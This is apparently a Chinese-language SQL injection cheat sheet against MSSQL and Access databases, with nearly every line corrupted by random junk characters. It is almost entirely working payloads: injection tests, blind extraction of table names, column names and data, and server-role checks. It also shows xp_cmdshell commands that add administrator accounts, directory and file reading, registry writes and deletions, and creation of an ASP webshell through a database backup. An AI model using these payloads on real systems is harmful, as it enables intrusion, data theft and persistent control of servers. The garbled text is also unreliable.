1.判断是否有注入;and 1=1 ;and 1=2 |i1z47jN6P
2.初步判断是否是mssql ;and user>0 e�;Q~P�]x�
�.2OP>:�9F
3.注入参数是字符'and [查询条件] and ''=' �0(teplo&P
OS�,-�dG(
4.搜索时没过滤参数的'and [查询条件] and '%25'=' n�Q8�EV>j2
=_=jXWOQv
5.判断数据库系统 �H3MT.C�pd
W�C}mt%H*O
;and (select count(*) from sysobjects)>0 mssql .nT"f>S&'
a]�75z)X�R
;and (select count(*) from msysobjects)>0 access t,+p!�"MRY
NH4�E��sV]
J\#6U|a""u
@@}A\wA�-
6.猜数据库 ;and (select Count(*) from [数据库名])>0 !SVW}Q=5#�
�A��9�F Z`
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 @"Do8p!*(6
�)TG\P�,H9
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ��%o.�+B~r
%N>�@( .��
9.(1)猜字段的ascii值(access) _M{m��6k(h
�sd
Z=�3)�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ��obUh+9K
?���zxKk(J
(2)猜字段的ascii值(mssql) ��8>
Gp #T
uPb�9j�;Q?
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 s|d�L.@0,L
A���Q�@A$�
10.测试权限结构(mssql) VM�|8HR7�U
rY88�x�h^
julAN$2���
?DM�-C5��$
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ��dDAdZx�d
cND2(<�jx:
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Wu%�;{y~#}
(,H�A��Os
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
�}?"f#�bI
y�U&A�[DZQ
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 90M��:�0SH
]oZ$,2�#;~
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- h|_G2p^J+"
M`A���bH19
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- 4{*K%p�v�\
;z!~-Byz�L
;and 1=(select IS_MEMBER('db_owner'));-- .b5B7��x}
s|�YY� i~�
R>#T��{<<L
t�:$�p�8qR
11.添加mssql和系统的帐户 t4��h5�R��
1,BtOzu�Ro
;exec master.dbo.sp_addlogin username;-- QZ%_hvY[%>
;exec master.dbo.sp_password null,username,password;-- 5��h1�FvJg
#2|sS�|0�<
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- G`�gY�wgU;
�B
+�_D*a�
;exec master.dbo.xp_cmdshell 'net user username password a!4'}g��HR
SC"�=M^�E
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- [R6�d�u�*P
i7:j(�W^I8
;exec master.dbo.xp_cmdshell 'net user username password /add';-- P�qx=j�_st
8%I4jL��<
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 7S),:Uy�[\
W�v$e/�N`l
A�ln�\:1MU
T3Q�a�[>+\
12.(1)遍历目录 z_CBOJl#C!
.�#EmE'IP*
;create table dirs(paths varchar(100), id int) q�48V|6X'q
�6d`��6=D:
;insert dirs exec master.dbo.xp_dirtree 'c:\' w9l�)=�[s=
�?�zKDPBj
;and (select top 1 paths from dirs)>0 *}�cF]8c5W
m3K�8hL��/
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) n+j�'�FfSz
7J7uHl`yq`
5�92q`m�\�
�f�GY. +W_
(2)遍历目录 0|�HD�(d`a
�qzsS�"=�5
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- !��Vv����$
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ^=F�tF9v��
[P,1�UO|$B
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 -�0Y�8/6](
{>��>f5o�3
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ]hN%~
~$>�
_K�8ob8)m�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��,`)!K}2�
a*�KB'u6�&
�-�E?h^J&U
&-s!k�o4z
13.mssql中的存储过程 ES�<�"��YF
2y �v'DS
xp_regenumvalues 注册表根键, 子键 2�Pasm��h�
�3Q�Z��w��
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $�yI!�YX�&
)!e�-5O49r
xp_regread 根键,子键,键值名 2�Cj?k.Zk
6*{N{]`WZ)
;exec xp_regread ��%d�KUB4�
�,=R�->~ J
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 %��)?$82=2
+^{yJ�p.H#
xp_regwrite 根键,子键, 值名, 值类型, 值 6ZR'1_i6i=
+wgNuj0=�*
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �gBf�%��9F
{�{S�eD:hx
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 l%rw�JLN1�
/�t(dhz&xN
xp_regdeletevalue 根键,子键,值名 b�_z�;^�y~
y`!��3Z} 7
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �f'Td�Y�G
=uI�u0�_�v
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 9�^c\$�"2B
zg�J%Z�r!~
�c�c��Z� A
�*��3s4JK�
14.mssql的backup创建webshell �4-lEo{IIM
d� ���{�T3
use model
3�Q�L'uk�
�PG�Oi#x��
create table cmd(str image); 3z��!\�Z�[
/t0�1��z~_
insert into cmd(str) values (''); �w`UB_h#Bl
Tmg~ZI:MW�
backup database model to disk='c:\l.asp'; �=ugx��Pgn
RL[?&L$7^%
�?s�d��Vd�
0' @��^PzX
15.mssql内置函数 �~u�b�Gx�
ix=HLF-0zC
;and (select @@version)>0 获得Windows的版本号 �@c�9VCG D
>s��1'�I:8
;and user_name()='dbo' 判断当前系统的连接用户是不是sa "'~'xaU!=a
JD^(L~�n]�
;and (select user_name())>0 爆当前系统的连接用户 '@3hU|�jO!
�wh<�+�.Zp
;and (select db_name())>0 得到当前连接的数据库 �R�]0awV1b
e3�y�BB�*@
"nf.k��j:>
k�z@@/DD/9
16.简洁的webshell �o2He}t�2o
EX~ U(J�B6
use model q1;}~}W;z4
K�E]!7+8-
create table cmd(str image); AVy��qtztQ
�k�
?���X
insert into cmd(str) values (''); t�q8B�)<(]
2a3�h�m8%U
backup database model to disk='g:\wwwtest\l.asp';
